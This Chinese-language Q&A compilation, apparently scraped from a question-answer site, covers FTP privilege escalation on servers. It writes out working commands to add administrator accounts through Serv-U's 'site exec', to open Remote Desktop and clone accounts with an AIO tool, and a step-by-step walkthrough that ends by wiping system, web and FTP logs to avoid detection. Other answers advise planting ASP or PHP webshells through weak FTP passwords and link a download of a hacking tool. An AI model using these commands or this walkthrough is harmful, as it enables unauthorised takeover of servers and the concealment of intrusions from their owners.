‘壹’ ftp提权工具的使用方法怎么使用
呵呵 我来答 。看这个 http://download.77169.com/donghua/hacker/200802/20080228FTPrq.zip
‘贰’ FTP的提权命令是多少·
quote site exec net user 用户名 密码 /add 添加用户
quote site exec net localgroup administrators 用户名 /add
‘叁’ ftp弱口令扫描软件-ftp破解工具---一定要【绝对神速】的
非常精辟的ftp客户端。目前体积最小的FTP客户端工具。
使用8uftp
涵盖其它FTP工具功能
独家支持多线程上传,使上传速度更快更稳定。
同时支持直接上传压缩包,可在空间上直接解压。也可以在空间上压缩后直接下载压缩包。
‘肆’ 关于FTP删除权限
ftp权限是由服务器的管理员限制了的,读取、写入、追加、删除、执行这几个权限等级,如果你没有办法删除文件那应该是管理员对ftp设置的问题,请联系他开放删除权限,要提升权限如果仅是从ftp入手的话基本上没有可能,除非他给你开了执行权限没开删除,呵呵!可以尝试从web或者其他方面进行入侵后在进行ftp的提权
‘伍’ 如何从webshell到FTP提权
应该是一个操作平台吧
‘陆’ ftp提权的问题
开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 (小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下)
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令:
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add
‘柒’ ftp怎么提权拿服务器 我有ftp的弱口令和密码 小白就不要来了
并不是所有的ftp服务器都可以提权的,要具体看采用的那个ftp的版本
‘捌’ 黑客如何利用ftp权限,攻击网站!有什么有效的防治方法
一般FTP权限,开的有web,相当于控制了这个网站,那么数据库扫描的,也能控制,可以进一步的提权
,围观楼下的疯狗,除了暴力破解,请问你还懂什么,垃圾
‘玖’ ftp弱口令有什么用
FTP 一般都是网站用 其他有可以作为传输。如果是网站FTP 你可以上传ASP木马 然后用ASP提权拿服务器如果是Server -u 的FTP弱口令 具备一些权限 可以用Server -U 进行提权
‘拾’ 我可以进入网站的后台,请问如何能拿到网站的FTP权限
FTP权限我个人观点有2种,
1 在后台想办法上传个后门马,例如是asp的程序,你就放个asp的网马。PHP就放PHP的马。然后利用自己的马,直接登入目录管理,也就是webshell 简称 shell
2就是直接拿下服务器,自然服务器里的所有网站程序都包括在内的,全部在你控制内。
当然,说是简单,其中涉及很多技术问题,例如,在后台中马,即使中了马有没足够的权限去控制整个ftp目录。这也就涉及到提权问题,我也只能说下简单的规程,具体看漏洞的情况。